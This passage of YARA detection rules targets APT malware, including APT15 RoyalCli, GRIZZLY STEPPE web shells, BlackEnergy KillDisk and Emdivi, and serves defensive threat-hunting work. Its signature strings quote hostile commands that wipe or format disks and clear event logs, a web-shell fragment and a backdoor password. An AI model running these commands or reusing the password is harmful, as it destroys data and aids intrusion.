"https://www.us-cert.gov/ncas/alerts/TA17-117A" strings: $s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 } $s1 = "C:/Users/user/Desktop/my_OK_2014/bit9/runsna/Release/runsna.pdb" fullword ascii $s2 = "d:/work/plug4.0(shellcode)" fullword ascii $s3 = "/shellcode/shellcode/XSetting.h" fullword ascii $s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 } $s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 } $s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 } $s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 } $s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 } $s9 = "RedLeavesCMDSimulatorMutex" condition: $s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9 } /* Cylance Rule */ rule Ham_backdoor { meta: author = "Cylance Spear Team" reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html" strings: $a = {8D 14 3E 8B 7D FC 8A 0C 11 32 0C 38 40 8B 7D 10 88 0A 8B 4D 08 3B C3} $b = {8D 0C 1F 8B 5D F8 8A 04 08 32 04 1E 46 8B 5D 10 88 01 8B 45 08 3B F2} condition: $a or $b } rule Tofu_Backdoor { meta: author = "Cylance Spear Team" reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html" strings: $a = "Cookies: Sym1.0" $b = "\\\\.\\pipe\\1[12345678]" $c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0} condition: $a or $b or $c } import "pe" rule clean_apt15_patchedcmd{ meta: author = "Ahmed Zaki" description = "This is a patched CMD. This is the CMD that RoyalCli uses." reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" sha256 = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f" strings: $ = "eisableCMD" wide $ = "%WINDOWS_COPYRIGHT%" wide $ = "Cmd.Exe" wide $ = "Windows Command Processor" wide condition: all of them } rule malware_apt15_royalcli_1{ meta: description = "Generic strings found in the Royal CLI tool" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" author = "David Cannings" sha256 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785" strings: $ = "%s~clitemp%08x.tmp" fullword $ = "qg.tmp" fullword $ = "%s /c %s>%s" fullword $ = "hkcmd.exe" fullword $ = "%snewcmd.exe" fullword $ = "%shkcmd.exe" fullword $ = "%s~clitemp%08x.ini" fullword $ = "myRObject" fullword $ = "myWObject" fullword $ = "10 %d %x\x0D\x0A" $ = "4 %s %d\x0D\x0A" $ = "6 %s %d\x0D\x0A" $ = "1 %s %d\x0D\x0A" $ = "3 %s %d\x0D\x0A" $ = "5 %s %d\x0D\x0A" $ = "2 %s %d 0 %d\x0D\x0A" $ = "2 %s %d 1 %d\x0D\x0A" $ = "%s file not exist" fullword condition: 5 of them } rule malware_apt15_royalcli_2{ meta: author = "Nikolaos Pantazopoulos" description = "APT15 RoyalCli backdoor" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" strings: $string1 = "%shkcmd.exe" fullword $string2 = "myRObject" fullword $string3 = "%snewcmd.exe" fullword $string4 = "%s~clitemp%08x.tmp" fullword $string5 = "hkcmd.exe" fullword $string6 = "myWObject" fullword condition: uint16(0) == 0x5A4D and 2 of them } rule malware_apt15_bs2005{ meta: author = "Ahmed Zaki" md5 = "ed21ce2beee56f0a0b1c5a62a80c128b" description = "APT15 bs2005" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" strings: $ = "%s&%s&%s&%s" wide ascii $ = "%s\\%s" wide ascii $ = "WarOnPostRedirect" wide ascii fullword $ = "WarnonZoneCrossing" wide ascii fullword $ = "^^^^^" wide ascii fullword /* "%s" /C "%s > "%s\tmp.txt" 2>&1 " */ $ = /"?%s\s*"?\s*\/C\s*"?%s\s*>\s*\\?"?%s\\(\w+\.\w+)?"\s*2>&1\s*"?/ $ ="IEharden" wide ascii fullword $ ="DEPOff" wide ascii fullword $ ="ShownVerifyBalloon" wide ascii fullword $ ="IEHardenIENoWarn" wide ascii fullword condition: (uint16(0) == 0x5A4D and 5 of them) or ( uint16(0) == 0x5A4D and 3 of them and ( pe.imports("advapi32.dll", "CryptDecrypt") and pe.imports("advapi32.dll", "CryptEncrypt") and pe.imports("ole32.dll", "CoCreateInstance")))} rule malware_apt15_royaldll{ meta: author = "David Cannings" description = "DLL implant, originally rights.dll and runs as a service" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d" strings: /* 56 push esi B8 A7 C6 67 4E mov eax, 4E67C6A7h 83 C1 02 add ecx, 2 BA 04 00 00 00 mov edx, 4 57 push edi 90 nop */ // JSHash implementation (Justin Sobel's hash algorithm) $opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 } /* 0F B6 1C 03 movzx ebx, byte ptr [ebx+eax] 8B 55 08 mov edx, [ebp+arg_0] 30 1C 17 xor [edi+edx], bl 47 inc edi 3B 7D 0C cmp edi, [ebp+arg_4] 72 A4 jb short loc_10003F31 */ // Encode loop, used to "encrypt" data before DNS request $opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C } /* 68 88 13 00 00 push 5000 # Also seen 3000, included below FF D6 call esi ; Sleep 4F dec edi 75 F6 jnz short loc_10001554 */ // Sleep loop $opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 } // Generic strings $ = "Nwsapagent" fullword $ = "\"%s\">>\"%s\"\\s.txt" $ = "myWObject" fullword $ = "del c:\\windows\\temp\\r.exe /f /q" $ = "del c:\\windows\\temp\\r.ini /f /q" condition: 3 of them } rule malware_apt15_royaldll_2 { meta: author = "Ahmed Zaki" sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d" description = "DNS backdoor used by APT15" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" strings: $= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii $= "netsvcs" wide ascii fullword $= "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword $= "SYSTEM\\CurrentControlSet\\Services\\" wide ascii $= "myWObject" wide ascii condition: uint16(0) == 0x5A4D and all of them and pe.exports("ServiceMain") and filesize > 50KB and filesize < 600KB } rule malware_apt15_exchange_tool { meta: author = "Ahmed Zaki" md5 = "d21a7e349e796064ce10f2f6ede31c71" description = "This is a an exchange enumeration/hijacking tool used by an APT 15" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" strings: $s1= "subjectname" fullword $s2= "sendername" fullword $s3= "WebCredentials" fullword $s4= "ExchangeVersion" fullword $s5= "ExchangeCredentials" fullword $s6= "slfilename" fullword $s7= "EnumMail" fullword $s8= "EnumFolder" fullword $s9= "set_Credentials" fullword $s10 = "/de" wide $s11 = "/sn" wide $s12 = "/sbn" wide $s13 = "/list" wide $s14 = "/enum" wide $s15 = "/save" wide $s16 = "/ao" wide $s17 = "/sl" wide $s18 = "/v or /t is null" wide $s19 = "2007" wide $s20 = "2010" wide $s21 = "2010sp1" wide $s22 = "2010sp2" wide $s23 = "2013" wide $s24 = "2013sp1" wide condition: uint16(0) == 0x5A4D and 15 of ($s*) } rule malware_apt15_generic { meta: author = "David Cannings" description = "Find generic data potentially relating to AP15 tools" reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" strings: // Appears to be from copy/paste code $str01 = "myWObject" fullword $str02 = "myRObject" fullword /* 6A 02 push 2 ; dwCreationDisposition 6A 00 push 0 ; lpSecurityAttributes 6A 00 push 0 ; dwShareMode 68 00 00 00 C0 push 0C0000000h ; dwDesiredAccess 50 push eax ; lpFileName FF 15 44 F0 00 10 call ds:CreateFileA */ // Arguments for CreateFileA $opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 } condition: 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT17_Sample_FXSST_DLL { meta: description = "Detects Samples related to APT17 activity - file FXSST.DLL" author = "Florian Roth" reference = "https://goo.gl/ZiJyQv" date = "2015-05-14" hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3" strings: $x1 = "Microsoft? Windows? Operating System" fullword wide $x2 = "fxsst.dll" fullword ascii $y1 = "DllRegisterServer" fullword ascii $y2 = ".cSV" fullword ascii $s1 = "GetLastActivePopup" $s2 = "Sleep" $s3 = "GetModuleFileName" $s4 = "VirtualProtect" $s5 = "HeapAlloc" $s6 = "GetProcessHeap" $s7 = "GetCommandLine" condition: uint16(0) == 0x5a4d and filesize < 800KB and ( 1 of ($x*) or all of ($y*) ) and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-12-29 Identifier: GRIZZLY STEPPE */ rule GRIZZLY_STEPPE_Malware_1 { meta: description = "Auto-generated rule - file HRDG022184_certclint.dll" author = "Florian Roth" reference = "https://goo.gl/WVflzO" date = "2016-12-29" hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5" strings: $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii $s2 = "Repeat last find command)Replace specific text with different text" fullword wide $s3 = "l\\Processor(0)\\% Processor Time" fullword wide $s6 = "Self Process" fullword wide $s7 = "Default Process" fullword wide $s8 = "Star Polk.exe" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 4 of them ) } rule GRIZZLY_STEPPE_Malware_2 { meta: description = "Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0" author = "Florian Roth" reference = "https://goo.gl/WVflzO" date = "2016-12-29" hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0" hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641" strings: $x1 = "GoogleCrashReport.dll" fullword ascii $s1 = "CrashErrors" fullword ascii $s2 = "CrashSend" fullword ascii $s3 = "CrashAddData" fullword ascii $s4 = "CrashCleanup" fullword ascii $s5 = "CrashInit" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them ) } rule PAS_TOOL_PHP_WEB_KIT_mod { meta: description = "Detects PAS Tool PHP Web Kit" reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity" author = "US CERT - modified by Florian Roth due to performance reasons" date = "2016/12/29" strings: $php = "<?php" $base64decode1 = "='base'.(" $strreplace = "str_replace(\"\\n\", ''" $md5 = ".substr(md5(strrev(" $gzinflate = "gzinflate" $cookie = "_COOKIE" $isset = "isset" condition: $php at 0 and (filesize > 10KB and filesize < 30KB) and #cookie == 2 and #isset == 3 and all of them } rule WebShell_PHP_Web_Kit_v3 { meta: description = "Detects PAS Tool PHP Web Kit" reference = "https://github.com/wordfence/grizzly" author = "Florian Roth" date = "2016/01/01" strings: $php = "<?php $" $php2 = "@assert(base64_decode($_REQUEST[" $s1 = "(str_replace(\"\\n\", '', '" $s2 = "(strrev($" ascii $s3 = "de'.'code';" ascii condition: ( $php at 0 or $php2 ) and filesize > 8KB and filesize < 100KB and all of ($s*) } rule WebShell_PHP_Web_Kit_v4 { meta: description = "Detects PAS Tool PHP Web Kit" reference = "https://github.com/wordfence/grizzly" author = "Florian Roth" date = "2016/01/01" strings: $php = "<?php $" $s1 = "(StR_ReplAcE(\"\\n\",''," $s2 = ";if(PHP_VERSION<'5'){" ascii $s3 = "=SuBstr_rePlACe(" ascii condition: $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT3102Code { meta: description = "3102 code features" author = "Seth Hardy" last_modified = "2014-06-25" strings: $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 } condition: any of them } rule APT3102Strings { meta: description = "3102 Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "rundll32_exec.dll\x00Update" // this is in the encrypted code - shares with 9002 variant //$ = "POST http://%ls:%d/%x HTTP/1.1" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT9002Code { meta: description = "9002 code features" author = "Seth Hardy" last_modified = "2014-06-25" strings: // start code block $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 } // decryption from other variant with multiple start threads $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC } condition: any of them } rule APT9002Strings { meta: description = "9002 Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "POST http://%ls:%d/%x HTTP/1.1" $ = "%%TEMP%%\\%s_p.ax" wide ascii $ = "%TEMP%\\uid.ax" wide ascii $ = "%%TEMP%%\\%s.ax" wide ascii // also triggers on surtr $ = "mydll.dll\x00DoWork" $ = "sysinfo\x00sysbin01" $ = "\\FlashUpdate.exe" condition: any of them } rule APT9002 { meta: description = "9002" author = "Seth Hardy" last_modified = "2014-06-25" condition: APT9002Code or APT9002Strings } rule FE_APT_9002 { meta: Author = "FireEye Labs" Date = "2013/11/10" Description = "Strings inside" Reference = "Useful link" strings: $mz = { 4d 5a } $a = "rat_UnInstall" wide ascii condition: ($mz at 0) and $a } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_backspace { meta: description = "Detects APT backspace" author = "Bit Byte Bitten" date = "2015-05-14" hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99" strings: $s1 = "!! Use Splice Socket !!" $s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)" $s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" condition: uint16(0) == 0x5a4d and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT_bestia { meta: author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com" date = "2014-03-19" description = "Bestia.3.02.012.07 malware used in APT attacks on Polish government" references = "http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/" /* PL */ hash0 = "9bb03bb5af40d1202378f95a6485fba8" hash1 = "7d9a806e0da0b869b10870dd6c7692c5" maltype = "apt" filetype = "exe" strings: /* generated with https://github.com/Xen0ph0n/YaraGenerator */ $string0 = "u4(UeK" $string1 = "nMiq/'p" $string2 = "_9pJMf" $string3 = "ICMP.DLL" $string4 = "EG}QAp" $string5 = "tsjWj:U" $string6 = "FileVersion" wide $string7 = "O2nQpp" $string8 = "2}W8we" $string9 = "ILqkC:l" $string10 = "f1yzMk" $string11 = "AutoIt v3 Script: 3, 3, 8, 1" wide $string12 = "wj<1uH" $string13 = "6fL-uD" $string14 = "B9Iavo<" $string15 = "rUS)sO" $string16 = "FJH{_/f" $string17 = "3e 03V" condition: 17 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-02-19 Identifier: BlackEnergy Malware */ rule BlackEnergy_BE_2 { meta: description = "Detects BlackEnergy 2 Malware" author = "Florian Roth" reference = "http://goo.gl/DThzLz" date = "2015/02/19" hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77" strings: $s0 = "<description> Windows system utility service </description>" fullword ascii $s1 = "WindowsSysUtility - Unicode" fullword wide $s2 = "msiexec.exe" fullword wide $s3 = "WinHelpW" fullword ascii $s4 = "ReadProcessMemory" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and all of ($s*) } rule BlackEnergy_VBS_Agent { meta: description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs" author = "Florian Roth" reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/" date = "2016-01-03" hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f" strings: $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii /* Goodware String - occured 1 times */ condition: filesize < 1KB and 2 of them } rule DropBear_SSH_Server { meta: description = "Detects DropBear SSH Server (not a threat but used to maintain access)" author = "Florian Roth" reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/" date = "2016-01-03" score = 50 hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd" strings: $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii $s2 = "Badly formatted command= authorized_keys option" fullword ascii $s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii $s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii $s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them } rule BlackEnergy_BackdoorPass_DropBear_SSH { meta: description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy" author = "Florian Roth" reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/" date = "2016-01-03" hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd" strings: $s1 = "passDs5Bu9Te7" fullword ascii condition: uint16(0) == 0x5a4d and $s1 } rule BlackEnergy_KillDisk_1 { meta: description = "Detects KillDisk malware from BlackEnergy" author = "Florian Roth" reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/" date = "2016-01-03" score = 80 super_rule = 1 hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80" hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6" hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d" hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95" strings: $s0 = "system32\\cmd.exe" fullword ascii $s1 = "system32\\icacls.exe" fullword wide $s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii $s3 = "shutdown /r /t %d" fullword ascii $s4 = "/C /Q /grant " fullword wide $s5 = "%08X.tmp" fullword ascii $s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii $s7 = "/c format %c: /Y /Q" fullword ascii $s8 = "taskhost.exe" fullword wide /* Goodware String - occured 1 times */ $s9 = "shutdown.exe" fullword wide /* Goodware String - occured 1 times */ condition: uint16(0) == 0x5a4d and filesize < 500KB and 8 of them } rule BlackEnergy_KillDisk_2 { meta: description = "Detects KillDisk malware from BlackEnergy" author = "Florian Roth" reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/" date = "2016-01-03" score = 80 super_rule = 1 hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80" hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6" hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95" strings: $s0 = "%c:\\~tmp%08X.tmp" fullword ascii $s1 = "%s%08X.tmp" fullword ascii $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" fullword wide $s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide condition: uint16(0) == 0x5a4d and filesize < 500KB and 3 of them } rule BlackEnergy_Driver_USBMDM { meta: description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281" author = "Florian Roth" reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" date = "2016-01-04" super_rule = 1 hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094" hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a" hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281" hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc" hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291" hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5" hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5" hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf" strings: $s1 = "USB MDM Driver" fullword wide $s2 = "KdDebuggerNotPresent" fullword ascii /* Goodware String - occured 50 times */ $s3 = "KdDebuggerEnabled" fullword ascii /* Goodware String - occured 69 times */ condition: uint16(0) == 0x5a4d and filesize < 180KB and all of them } rule BlackEnergy_Driver_AMDIDE { meta: description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1" author = "Florian Roth" reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" date = "2016-01-04" super_rule = 1 hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614" hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2" hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c" hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1" hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc" hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988" hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68" strings: $s1 = " AMD IDE driver" fullword wide $s2 = "SessionEnv" fullword wide $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Emdivi_SFX { meta: description = "Detects Emdivi malware in SFX Archive" author = "Florian Roth @Cyber0ps" reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/" date = "2015-08-20" score = 70 hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196" hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b" strings: $x1 = "Setup=unsecess.exe" fullword ascii $x2 = "Setup=leassnp.exe" fullword ascii $s1 = "&Enter password for the encrypted file:" fullword wide $s2 = ";The comment below contains SFX script commands" fullword ascii $s3 = "Path=%temp%" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 740KB and (1 of ($x*) and all of ($s*)) } rule Emdivi_Gen1 { meta: description = "Detects Emdivi Malware" author = "Florian Roth @Cyber0ps" reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/" date = "2015-08-20" score = 80 super_rule = 1 hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24" hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1" hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662" hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86" strings: $x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide $s0 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide $x3 = "userControl-v80.exe" fullword ascii $s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide $s2 = "http://www.msftncsi.com" fullword wide $s3 = "net use | find /i \"c$\"" fullword wide $s4 = " /del /y & " fullword wide $s5 = "\\auto.cfg" fullword wide $s6 = "/ncsi.txt" fullword wide $s7 = "Dcmd /c" fullword wide $s8 = "/PROXY" fullword wide condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule Emdivi_Gen2 { meta: description = "Detects Emdivi Malware" author = "Florian Roth @Cyber0ps" reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/" date = "2015-08-20" super_rule = 1 score = 80 hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1" hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012" hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4" strings: $s1 = "%TEMP%\\IELogs\\" fullword ascii $s2 = "MSPUB.EXE" fullword ascii $s3 = "%temp%\\" fullword ascii $s4 = "\\NOTEPAD.EXE" fullword ascii $s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii $s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii $s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1300KB and 6 of them } rule Emdivi_Gen3 { meta: description = "Detects Emdivi Malware" author = "Florian Roth @Cyber0ps" reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/" date = "2015-08-20" super_rule = 1 score = 80 hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e" hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d" strings: $x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii $s2 = "\\Mozilla\\Firefox\\Profiles\\" fullword ascii $s4 = "\\auto.cfg" fullword ascii $s5 = "/ncsi.txt" fullword ascii $s6 = "/en-us/default.aspx" fullword ascii $s7 = "cmd /c" fullword ascii $s9 = "APPDATA" fullword ascii /* Goodware String - occured 25 times */ condition: uint16(0) == 0x5a4d and filesize < 850KB and (( $x1 and 1 of ($s*)) or ( 4 of ($s*))) } rule Emdivi_Gen4 { meta: description = "Detects Emdivi Malware" author = "Florian Roth @Cyber0ps" reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/" date = "2015-08-20" super_rule = 1 score = 80 hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e" hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24" hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1" hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662" hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86" hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d" strings: $s1 = ".http_port\", " fullword wide $s2 = "UserAgent: " fullword ascii $s3 = "AUTH FAILED" fullword ascii $s4 = "INVALID FILE PATH" fullword ascii $s5 = ".autoconfig_url\", \"" fullword wide $s6 = "FAILED TO WRITE FILE" fullword ascii $s7 = ".proxy" fullword 